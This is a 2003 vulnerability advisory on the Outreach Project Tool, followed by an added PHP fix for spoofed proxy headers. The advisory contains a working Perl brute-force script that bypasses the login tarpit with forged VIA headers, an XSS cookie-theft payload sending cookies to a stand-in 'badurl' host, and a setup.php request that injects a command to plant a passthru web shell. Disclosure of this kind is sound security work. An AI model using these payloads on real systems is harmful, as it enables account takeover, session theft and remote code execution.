to the list, 2003/01/16 @mei@websec.org

=====================================
Outreach Project Tool
=====================================

Product: O.P.T (Version opt_0.946b / Earlier versions may be vulnerable too)
Vendor: Lanifex (http://www.lanifex.com/business/business_en/products/815.html)
License: GPL
VendorStatus: Informed on Oct 2002
VendorStatus: ---
VendorPatch: ---
Local: NO
Remote: YES
Vulnerabilities:
 1) Tarpit out-cheat (brute-force attack)
 2) Cross-Site-Scripting
 3) Setup
Tested Platforms: Linux / Slackware 8.0 i686 / Apache 1.3.*
Severity: MEDIUM

============
Introduction
============

The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementation. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consultants and their clients, as well as a wide range of other applications.

=====================
Vulnerability Details
=====================

SUMMARY

1) Request header allows tarpit out-cheat
2) Multiple XSS problems in community/forums
3) Setup (/opt/setup) permission issues

B) Description of Vulnerabilities

1) REQUEST-HEADER TARPIT - OUT-CHEAT

The function "OPT_remote_IP()" (/opt/general.php) accepts the "X_FORWARDED_FOR" and "VIA" environment variables. This is done to identify possible proxy servers. Unfortunately these variables are taken from the HTTP request headers, so the client can set them to any value. With the following HTTP request:

---*---
GET /opt/whatever HTTP/1.1
Host: whatever
VIA: 1.2.3.4
---*---

"$HTTP_VIA" will be used as the user's IP. This leads to:

- Anonymous use of the application
- Possibility of a brute-force attack against accounts (the per-IP tarpit is bypassed by sending a different header value with every request)

Simple example for a brute-force attack against OPT:

---cut here---
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;

my ($url,$uid,$pf) = @ARGV;
open(P,"< $pf") || die "passf.?\n";
my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully !
while(<P>){
    my $pwd = $_;
    chomp($pwd);
    my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) );
    my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h);
    my $hds = $res->headers;
    my $new = $hds->header("Location");
    my $res2 = $ua->request(GET "$new",%h);
    $res2 = $ua->request(GET "$new",%h);   # strange db-redirect stuff ?!!
    my $cod = $res2->code;
    my $pag = $res2->content;
    print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n";
}
close (P);
---cut here---

2) SEVERAL XSS VULNERABILITIES

Help / Forums / and others

Typical XSS vulnerabilities exist in many, if not most, of the community functions.

Example: Once logged in, go to "Notes -> News -> Ad News" and create a News entry with scripting tags included:

---cut here---
hello i am a news thing .. bla bla ... <script> alert(document.cookie); </script>
---cut here---

Now every user gets an alert window with his own session id (only as an example!!). Of course it is possible to steal the OPT_Session by requesting another URL where a so-called cookie-theft is installed!! (location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...)

This vulnerability makes it possible, once logged in, to steal "any" other user's account (administrator included!).

3) SETUP-ISSUES (/opt/setup)

If the lockfile "lock01" in the setup_lock directory is not removed due to wrong permission settings, or someone is able/allowed to create a file "lock01", it is possible to:

a) Create a new Setup
b) Execute system commands through the setup.php script. This is because the "temp_CRM_dir" parameter is passed directly to the PHP exec function.

Example GET request:

---cut here---
http://localhost/opt/setup/setup.php?
CRM_email=opti@localhost
&CRM_system_email=mei@localhost
&CRM_path=/disk2/apps/opt/OPT_0.946b/opt
&CRM_db_host=localhost
&CRM_db_uname=opt
&CRM_db_pwd=opt
&CRM_db_db=opt
&CRM_may_demo=0
&temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php;
&CRM_mail_fname=OPT_incoming_mail
&action=Set up my OPT server
---cut here---

The above will create a script called "bad.php" with the content (<?passthru($c)?>) in the OPT setup directory!

=======
Remarks
=======

---

====================
Recommended Hotfixes
====================

After installation check if the file "lock01" exists in the setup_lock directory. If yes, remove it.

The other vulnerabilities can only be fixed by software patches.

EOF

Martin Eiszner / @2002WebSec.org

=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
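As an added illustration of the software-level fix for vulnerability 1 (the tarpit out-cheat), the following PHP is not OPT's or Lanifex's code. It shows the shape a replacement for OPT_remote_IP() should take: forwarding headers are honoured only when the TCP peer is a reverse proxy the site operator runs (the addresses in OPT_TRUSTED_PROXIES are assumed values), so a client-supplied VIA or X-Forwarded-For on a direct connection can no longer change the address the tarpit counts against.

```php
<?php
// Added example, not code from OPT or Lanifex. Hardened client-address lookup:
// the socket address (REMOTE_ADDR) is authoritative unless it belongs to one of
// our own reverse proxies; only then is X-Forwarded-For consulted.

// Reverse proxies operated by the site (assumed addresses for illustration).
const OPT_TRUSTED_PROXIES = ['10.0.0.5', '10.0.0.6'];

// Returns the address to key tarpit counters and login logs on.
// $server is normally $_SERVER; passing it in keeps the function testable.
function opt_remote_ip_hardened(array $server): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';              // no usable socket address at all
    }
    if (!in_array($peer, OPT_TRUSTED_PROXIES, true)) {
        return $peer;                  // direct client: every header is ignored
    }
    // X-Forwarded-For is "client, proxy1, proxy2": each proxy appends the peer
    // it saw. Walk from the right, skipping our own proxies; the first address
    // that is not ours is the one our outermost proxy really talked to. Any
    // entries further left were supplied by the client and are never trusted.
    // HTTP_VIA is not consulted: it names proxies, not the client.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    foreach (array_reverse($hops) as $hop) {
        if (in_array($hop, OPT_TRUSTED_PROXIES, true)) {
            continue;
        }
        return filter_var($hop, FILTER_VALIDATE_IP) !== false ? $hop : $peer;
    }
    return $peer;                      // header absent: fall back to the proxy
}

// Constructed requests, not captured traffic. The first mimics the advisory's
// bypass: forged VIA / X-Forwarded-For headers on a direct connection.
$direct = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_VIA'             => '1.2.3.4',
    'HTTP_X_FORWARDED_FOR' => '1.2.3.4',
];
// Second: real client behind two of our proxies, again with a forged prefix.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '1.2.3.4, 198.51.100.9, 10.0.0.6',
];
echo opt_remote_ip_hardened($direct), "\n";   // socket address wins, forgery ignored
echo opt_remote_ip_hardened($viaProxy), "\n"; // the proxy-appended client, not the forged prefix
```

With this in place, per-request changes to VIA or X-Forwarded-For by a direct client all map to the same REMOTE_ADDR, so the tarpit's failed-login counter keeps accumulating.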